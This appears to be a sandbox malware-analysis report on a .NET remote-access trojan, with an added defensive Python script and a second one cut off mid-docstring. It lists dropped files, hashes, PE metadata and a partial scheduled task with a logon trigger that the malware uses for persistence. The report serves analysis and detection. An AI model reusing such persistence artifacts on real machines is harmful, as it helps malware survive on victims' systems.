Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process:C:\Users\user\AppData\Roaming\zDAKFK.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1216
Entropy (8bit):5.34331486778365
Encrypted:false
SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:1330C80CAAC9A0FB172F202485E9B1E8
SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
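The two records above describe byte-identical content (same size, entropy, MD5, SHA1, SHA-256 and SHA-512; by its format it is the .NET CLR v4 usage log that every .NET Framework process writes), yet the copy dropped by the submitted sample is flagged Malicious:true and the copy dropped by zDAKFK.exe is flagged Malicious:false. The flag therefore carries context (which process wrote the file), not a judgement about the bytes, and an analyst who pivots on "Malicious:true" dropped files without checking this will chase a benign runtime artifact. The Python below is an added example and is not part of the Joe Sandbox report: it parses records in the report's own Key:Value layout, groups them by SHA-256, reports content whose verdicts disagree, and recomputes the report's size, entropy and hash fields so a file recovered from a host can be matched against a record. RECORDS_TXT is a constructed excerpt copied from the three records' own values (only the fields the script uses); "Entropy (8bit)" is assumed to be byte-wise Shannon entropy, and the self-check hashes are the standard test vectors for the input "abc".

```python
import hashlib
import math
from collections import defaultdict

# Constructed excerpt: three dropped-file records from the report, copied
# field-for-field, keeping only the fields this script uses.
RECORDS_TXT = """\
Process:C:\\Users\\user\\Desktop\\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Size (bytes):1216
Entropy (8bit):5.34331486778365
SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
Malicious:true
Process:C:\\Users\\user\\AppData\\Roaming\\zDAKFK.exe
Size (bytes):1216
Entropy (8bit):5.34331486778365
SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
Malicious:false
Process:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Size (bytes):60
Entropy (8bit):4.038920595031593
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
"""


def parse_records(text):
    """Split Key:Value lines into one dict per record; a record starts at
    each 'Process:' line, exactly as the report lays them out."""
    records = []
    for line in text.splitlines():
        key, sep, value = line.partition(":")  # first colon only, so 'C:\' paths survive
        if not sep:
            continue
        key = key.strip()
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value.strip()
    return records


def conflicting_verdicts(records):
    """Map SHA-256 -> sorted dropping processes for content whose records
    disagree on the Malicious flag. A hit means the flag was driven by who
    dropped the file, not by the bytes themselves."""
    by_hash = defaultdict(list)
    for rec in records:
        by_hash[rec["SHA-256"].lower()].append(rec)
    conflicts = {}
    for digest, group in by_hash.items():
        if len({rec["Malicious"].lower() for rec in group}) > 1:
            conflicts[digest] = sorted(rec["Process"] for rec in group)
    return conflicts


def shannon_entropy(data):
    """Byte-wise Shannon entropy in bits per byte (0.0 .. 8.0); assumed to be
    what the report reports as 'Entropy (8bit)'."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def fingerprint(data):
    """Recompute the report's size, entropy and hash fields for raw bytes,
    using the report's upper-case hex convention."""
    return {
        "Size (bytes)": len(data),
        "Entropy (8bit)": shannon_entropy(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def matches_record(data, record):
    """True when bytes recovered from a host are the file a record describes."""
    fp = fingerprint(data)
    return (fp["Size (bytes)"] == int(record["Size (bytes)"])
            and fp["SHA-256"] == record["SHA-256"].upper())


if __name__ == "__main__":
    recs = parse_records(RECORDS_TXT)
    for digest, procs in conflicting_verdicts(recs).items():
        print(f"conflicting verdicts for {digest}:")
        for proc in procs:
            print(f"    dropped by {proc}")
    # Self-check against the standard test vectors for b"abc".
    print(fingerprint(b"abc"))
```

Run it on the full dropped-files table and anything that appears under conflicting_verdicts can be deprioritised as a context-flagged artifact; matches_record is the check to run on a file pulled from an infected host before trusting that it is the one the report describes.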

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):2232
Entropy (8bit):5.380192968514367
Encrypted:false
SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:+LHyIFKL3IZ2KRH9OugYs
MD5:9AA3EC09E507E3B6521730FDDCF550A3
SHA1:19E688C78EB2FBE0D620C0055293DA06411512D0
SHA-256:E50F69B84C0E4B5D2CFE80C5B7B4AF6398A862F098D06B138388F7D49ABAB0B8
SHA-512:04B3A49C7FB0DFFF413095AB046296C779A1978D64CDAE35858435A5E41221AE6726421F1FB116EBF7E2DB314602A544F5C8AD7F0F96FCC04D694AD6C1E78E81
Malicious:false
Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
File Type:XML 1.0 document, ASCII text
Category:dropped
Size (bytes):1572
Entropy (8bit):5.117125709791142
Encrypted:false
SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta8xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTJv
MD5:D277BF01DB131620DB61F1C4DAFE7E52
SHA1:DCBB4EC7398F64012BA90A82B7803F17F6D66E10
SHA-256:17BEB203FDD44E83826F4A82A1CFF31AD475E83BC60EBA4C8146A1EB5EDCB2C7
SHA-512:A199942B2B87254714C72968A0CF17BF0477E26B6ED85BE11AF061FB50F72AF2A14E8FE28C857D8493846C62AB0DB0D2C3793704CCB1108852AD8B67947CDACA
Malicious:true
Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
Process:C:\Users\user\AppData\Roaming\zDAKFK.exe
File Type:XML 1.0 document, ASCII text
Category:dropped
Size (bytes):1572
Entropy (8bit):5.117125709791142
Encrypted:false
SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta8xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTJv
MD5:D277BF01DB131620DB61F1C4DAFE7E52
SHA1:DCBB4EC7398F64012BA90A82B7803F17F6D66E10
SHA-256:17BEB203FDD44E83826F4A82A1CFF31AD475E83BC60EBA4C8146A1EB5EDCB2C7
SHA-512:A199942B2B87254714C72968A0CF17BF0477E26B6ED85BE11AF061FB50F72AF2A14E8FE28C857D8493846C62AB0DB0D2C3793704CCB1108852AD8B67947CDACA
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):921600
Entropy (8bit):7.688951081126668
Encrypted:false
SSDEEP:24576:7q0qQmN5TGwahM4GrYOkwm+HFY7aJVn7KiQ:7qamLtT50Ok8y7ajXQ
MD5:57FCB286B01ACC3318E455C23D5F857F
SHA1:A01A9DE8ED1DBD2DAD4285748ED1EB2A4765F8D0
SHA-256:9E29FDEAF847390EF0AC52A24DCA3803EB3B7527E3ECB8C2C18BC337C7425A5E
SHA-512:C4733810C9126435FEBEDD867CEE2C399044B491B72C09BAA4F24E412B581F69490BD45576674EBA99F406CF180A3DD4FE9BF07DF1189106ACED4204FB55B911
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 21%
• Antivirus: Virustotal, Detection: 22%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x,,g..............0......4........... ........@.. .......................`............@.....................................O........1...................@..........T............................................ ............... ..H............text........ ...................... ..`.rsrc....1.......2..................@..@.reloc.......@......................@..B........................H.......H...............,...............................................B.(.......(.....*....0..S.........s....}.....s....}.....s....}.....s....}.....s....}.....sI...}.....s....}.....s....}.....s....}.....{....o .....{....o .....{....o .....( .....{....(!...o".....{.....o#.....{.... >....Cs$...o%.....{....r...po&.....{.....:.:s'...o(.....{.....%o).....{...........s*...o+.....{....r)..p"...@.. ....s,...o-.....{.... >....6s$...o%.....{....r7..po&.....{.....?..s'...o(.....{.....
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.4658282988286535
Encrypted:false
SSDEEP:6144:5IXfpi67eLPU9skLmb0b4WWSPKaJG8nAgejZMMhA2gX4WABl0uN9dwBCswSb1:KXD94WWlLZMM6YFHP+1
MD5:419BF42ED3C5CB8511DD4B4FE4222923
SHA1:76F652937AB160D4F5851441299131772B7E74CB
SHA-256:802DFB7A36632C1261A7DB2B8D05C7B2F6541B183B8D425213F519F71FC38AC6
SHA-512:E4A2A1FDDFB2CC5F64EB5DAF20189656B8FC061A16266F93AAD01C5C663C0E9265A11F3FD90F4627EF99ADDB386DAA45CA7F4DE4A6C1B3D1E766A42B6A311826
Malicious:false
Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"....0..............................................................................................................................................................................................................................................................................................................................................P_..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.688951081126668
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                    File name:SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                                                    File size:921'600 bytes
                                                                                                                                                                    MD5:57fcb286b01acc3318e455c23d5f857f
                                                                                                                                                                    SHA1:a01a9de8ed1dbd2dad4285748ed1eb2a4765f8d0
                                                                                                                                                                    SHA256:9e29fdeaf847390ef0ac52a24dca3803eb3b7527e3ecb8c2c18bc337c7425a5e
                                                                                                                                                                    SHA512:c4733810c9126435febedd867cee2c399044b491b72c09baa4f24e412b581f69490bd45576674eba99f406cf180a3dd4fe9bf07df1189106aced4204fb55b911
                                                                                                                                                                    SSDEEP:24576:7q0qQmN5TGwahM4GrYOkwm+HFY7aJVn7KiQ:7qamLtT50Ok8y7ajXQ
                                                                                                                                                                    TLSH:5415CED03B756B09DEA947B98529DDB443B12968B000FBE64ADC3BD739893519E0CF83
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x,,g..............0......4........... ........@.. .......................`............@................................
                                                                                                                                                                    Icon Hash:8d865727655c0f0c
                                                                                                                                                                    Entrypoint:0x4df9ea
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x672C2C78 [Thu Nov 7 02:56:56 2024 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (not reported)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (this line is repeated 97 times in the report: the 0x00 bytes that follow the 6-byte jump stub decode as add byte ptr [eax], al)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdf998 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe0000 | 0x31bc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xdb4fc | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xdd9f0 | 0xdda00 | 0bbfa2b6c1e678cf8138fc88e6cee6fe | False | 0.8378124118725324 | data | 7.689431828463277 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe0000 | 0x31bc | 0x3200 | a5464d9f6df14c1d2f0fb9c25446988b | False | 0.929453125 | data | 7.769403192679374 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe4000 | 0xc | 0x200 | b290770fa2848c4a46dc7a040099432e | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xe0100 | 0x2be0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9877136752136753
RT_GROUP_ICON | 0xe2cf0 | 0x14 | data | | | 1.05
RT_VERSION | 0xe2d14 | 0x2a8 | data | | | 0.5088235294117647
RT_MANIFEST | 0xe2fcc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
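The values above fit together: the entry point is a `jmp dword ptr [00402000h]`, the IAT is 8 bytes at RVA 0x2000, a 0x48-byte COM descriptor (CLR header) sits right behind it at 0x2008, and the only import is mscoree.dll!_CorExeMain. That is the standard static fingerprint of any 32-bit .NET executable. What is not standard is the entropy of .text (7.69) and .rsrc (7.77), both close to the 8-bit ceiling; plain IL and metadata sit well below that, so those sections almost certainly carry compressed or encrypted payload that the managed code unpacks at run time. The script below is an added example, not part of the Joe Sandbox report: it decodes the entry stub, checks that it jumps through the IAT into the CLR entry, and computes the two metrics the section table reports. It assumes an image base of 0x400000 (the jump target 0x402000 minus the IAT RVA 0x2000; the image base itself is not printed in this part of the report) and assumes "ZLIB Complexity" means zlib-compressed size divided by raw size, which is consistent with the tiny RT_GROUP_ICON resource scoring 1.05. Section figures are copied from the table above.

```python
"""Static triage of a 32-bit .NET PE from the values a sandbox's PE summary reports.

Added example, not part of the Joe Sandbox report. Assumes image base 0x400000
(jump target 0x402000 minus the IAT RVA 0x2000) and that 'ZLIB Complexity'
means zlib-compressed size divided by raw size.
"""
from __future__ import annotations

import math
import struct
import zlib
from typing import Optional

# Values copied from the report's header, directory and section tables.
IMAGE_BASE = 0x400000            # assumed: not printed in the section above
IAT_RVA, IAT_SIZE = 0x2000, 0x8
COM_DESCRIPTOR_RVA, COM_DESCRIPTOR_SIZE = 0x2008, 0x48
# jmp dword ptr [0x402000] followed by the zero padding the disassembler showed
ENTRY_STUB = bytes.fromhex("ff25 0020 4000 0000 0000")
SECTIONS = [
    {"name": ".text",  "raw_size": 0xDDA00, "entropy": 7.689431828463277},
    {"name": ".rsrc",  "raw_size": 0x3200,  "entropy": 7.769403192679374},
    {"name": ".reloc", "raw_size": 0x200,   "entropy": 0.10191042566270775},
]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a single repeated value, 8.0 for a uniform distribution."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Compressed/raw size ratio. Incompressible data gives about 1.0; tiny inputs
    can exceed 1.0 because of zlib framing, which is why RT_GROUP_ICON shows 1.05."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def decode_jmp_indirect(stub: bytes) -> Optional[int]:
    """Decode 'FF 25 disp32' (jmp dword ptr [disp32]) and return disp32, else None.
    Every managed .exe built for x86 starts with this stub: the native loader lands
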